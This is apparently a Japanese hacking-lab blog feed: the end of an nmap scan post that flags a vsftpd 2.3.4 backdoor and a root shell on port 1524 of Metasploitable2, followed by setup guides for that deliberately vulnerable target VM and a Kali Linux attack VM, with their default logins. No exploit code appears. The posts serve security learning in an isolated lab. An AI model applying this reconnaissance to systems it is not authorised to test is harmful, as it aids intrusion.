Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.87 seconds

検出されたポート番号のうち、特に気になるものは次の通りです。

・7行目　ポート21:vsfpd
・20行目ポート1524:Metasploiteble root shell
・26行目ポート5900:VNC

検出されたポート、サービスを脆弱性調査用のサイトで検索すると、
いくつか脆弱性を確認することができます。

例えば最初に見つけたポート21のvsftpd 2.3.4向けのExploitを探すと、
「Backdoor Command Execution」という脆弱性があることがわかりました。
この脆弱性はリモートからコマンド実行を可能とするバックドアが含まれているようです。

ポートスキャンの実験はここまでとなります。

6.まとめ

nmapを使ったポートスキャンにより、脆弱性を発見することができました。
今回はあらかじめ脆弱性のあるホストをターゲットとして実験しましたが、
自身が管理している機器への調査や監査も可能です。

参考サイト、文献

Metasploitable - Browse /Metasploitable2 at SourceForge.net

価格:6,335円
(2021/12/16 01:03時点)

Metasploitable2構築ターゲットマシン

エイド — Fri, 10 Dec 2021 22:00:00 +0000

1.目的
2.VMware
3.Metasploitable2のダウンロード
4.Metasploitable2の起動
5.日本語キーボードへの変更
6.静的IPの設定
7.まとめ
参考サイト、文献

1.目的

ハッキングの実験をするにあたって、攻撃先マシン（ターゲット）の準備を行います。
安全性を考慮して独立したネットワークに準備したいため、
仮想化ソフトにMetasploitable2を構築します。

Metasploitable2とは、あえて脆弱性が存在する状態で構成されたLinuxです。
Linuxに対するハッキングの基本的な流れを理解するために活用できます。

2.VMware

本記事では、「VMware Workstation Player」に仮想マシンを作成します。
VMware Workstation Playerは無料の仮想化ソフトとなっており、
検索すれば、導入方法がたくさん紹介されていると思います。
（今後、別記事で紹介するかも。。）

3.Metasploitable2のダウンロード

以下ダウンロードページにアクセスします。

Metasploitable is an intentionally vulnerable Linux virtual machine

ダウンロードしたファイルを解凍し、[Metasploitable.vmx]をVMwareにインポートします。

4.Metasploitable2の起動

VMwareの仮想マシンの再生ボタンから起動できます。

以下画面が表示されたら、初期ユーザ/パスワードを入力してログインします。
ユーザ名：msfadmin
パスワード：msfadmin

5.日本語キーボードへの変更

初期は英語キーボードとなってるため、日本語キーボードを使っているのであれば変更します。
※再起動すると英語キーボードに戻ります。

$ sudo loadkeys jp

6.静的IPの設定

デフォルトでは動的IPが割る振られています。
自動でIPが変わると攻撃を行う際に手間なので、静的IPに変更します。
まずは、現在のIPアドレスを確認します。

$ ifconfig

現在のIPアドレス、サブネットマスク、デフォルトゲートウェイをメモします。
筆者は以下となってましたが、環境によって変化する可能性があります。

viコマンドで以下ネットワーク設定を変更します。
※上記でメモしたアドレスを追加

$ sudo vi /etc/network/interfaces

（編集前）

（編集後）

サービスを再起動し、アドレスが反映されているか確認します。

$ sudo /etc/init.d/networking restart
$ ifconfig

ホストOSへPingが通ることを確認します。

$ ping 192.168.238.255 -b

7.まとめ

攻撃先のマシンを構築しました。
ターゲットへのハッキング練習を行い、セキュリティの知識を学んでいきましょう。
他の記事では、Metasploitableへの疑似的な攻撃を紹介していきたいと思います。

攻撃用マシンの構築は以下をご覧ください。

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。 Kali Linuxの準備、基本設定を実施します。

注意事項
このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。
他者の機器やネットワークで試すことは絶対にしないでください。詳しくはこちら

参考サイト、文献

Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and...

価格:6,335円
(2021/12/16 01:03時点)

Kali Linux 2021.2 構築攻撃用マシン

エイド — Wed, 08 Dec 2021 22:00:00 +0000

1.目的
2.VMware
3.Kali Linuxのダウンロード
4.Kali Linuxの起動
- 4-1.仮想マシンの起動
- 4-2.ログイン
5.パッケージの更新
6.基本設定
7.まとめ
参考サイト、文献

1.目的

ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。
安全性を考慮して独立したネットワークに準備したいため、仮想化ソフトにKali Linuxを構築します。

Kali Linuxとはペネトレーションテスト用のLinuxディストリビューションです。
300以上のペネトレーションテスト用のプログラムが最初からインストールされています。
※ペネトレーションテストとは実際の攻撃手法を試みてシステムに脆弱性がないかどうかテストする手法です。

2.VMware

3.Kali Linuxのダウンロード

以下ダウンロードページにアクセスします。

Get Kali | Kali Linux

「Virtual Machines」をクリックします。

32bit/64bitが用意されているので、環境に合わせて選択します。
本記事では64bit版の「VMware」を使用します。
ダウンロードマークからダウンロードします。

ダウンロードしたファイルを解凍します。
VMwareの「仮想マシンを開く」から、解凍したフォルダ内の[vmx]ファイルを開きます。

インポート完了です。

4.Kali Linuxの起動

4-1.仮想マシンの起動

VMwareの仮想マシンの再生ボタンから起動できます。

GRUBブート画面が表示されます。

そのまま数秒待てば、そのまま起動します。
すぐに起動したい場合は”Kali GNU/Linux”を選択し[Enter]キーを押下します。

4-2.ログイン

以下画面が表示されたら、初期ユーザ/パスワードを入力してログインします。
ユーザ名：kali
パスワード：kali

5.パッケージの更新

左上の黒いアイコンのターミナルを起動します。

下記のコマンドを入力し、更新します。（しばらく時間がかかります）

$ sudo apt-get update
$ sudo apt-get upgrade

6.基本設定

6-1.スクリーンロックを無効にする

デフォルトで5分間何も操作しないと、画面が自動でロックします。
解除するには再度パスワードを入力する必要があり、
とても手間なので、画面がロックしないように設定します。

画面左上のKali Linuxのアイコンから「Settings」>「Power Manager」を開きます。

「Display」タブのDisplay power managementをすべて0分（Never）に変更します。

6-2.日本語化パッケージをインストール

ターミナルから下記のコマンドを入力し、インストールします。

$ sudo apt-get install -y task-japanese task-japanese-desktop

6-3.日本語表示にする

ターミナルから下記のコマンドを入力し、実行します。

$ sudo dpkg-reconfigure locales

スクロールして「ja_JP.UTF-8」をスペースキーで選択します。
TABキーでフォーカスを変更して、＜OK＞でEnterを押下します。

「ja_JP.UTF-8」を選択して、＜OK＞でEnterを押下します。

下記のコマンドを入力し、実行します。

$ sudo update-locale LANG=ja_JP.UTF-8

完了したら、Kali Linuxを再起動します。

6-4.日本語キーボードに対応

画面左上のKali Linuxのアイコンから「設定」>「キーボード」を開きます。

レイアウトのタブから「システムのデフォルトを使用する」をオフにしておきます。
キーボードレイアウトを編集し、英語（US）から日本語（OADG109A）に変更します。

6-5.タイムゾーンを日本に設定する

画面右上の時間表示を右クリック>プロパティを開きます。

タイムゾーンに「Japan」を入力し。閉じます。

7.まとめ

簡単ではありますが、攻撃用のマシンを構築しました。
これを使い、ハッキングの実験やセキュリティの知識を学んでいきましょう。
また、他の記事ではKali Linuxにインストールされているプログラムを紹介していきたいと思います。

攻撃先（ターゲット）マシンの構築は以下をご覧ください。

ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。 Metasploitable2の準備、基本設定を実施します。

参考サイト、文献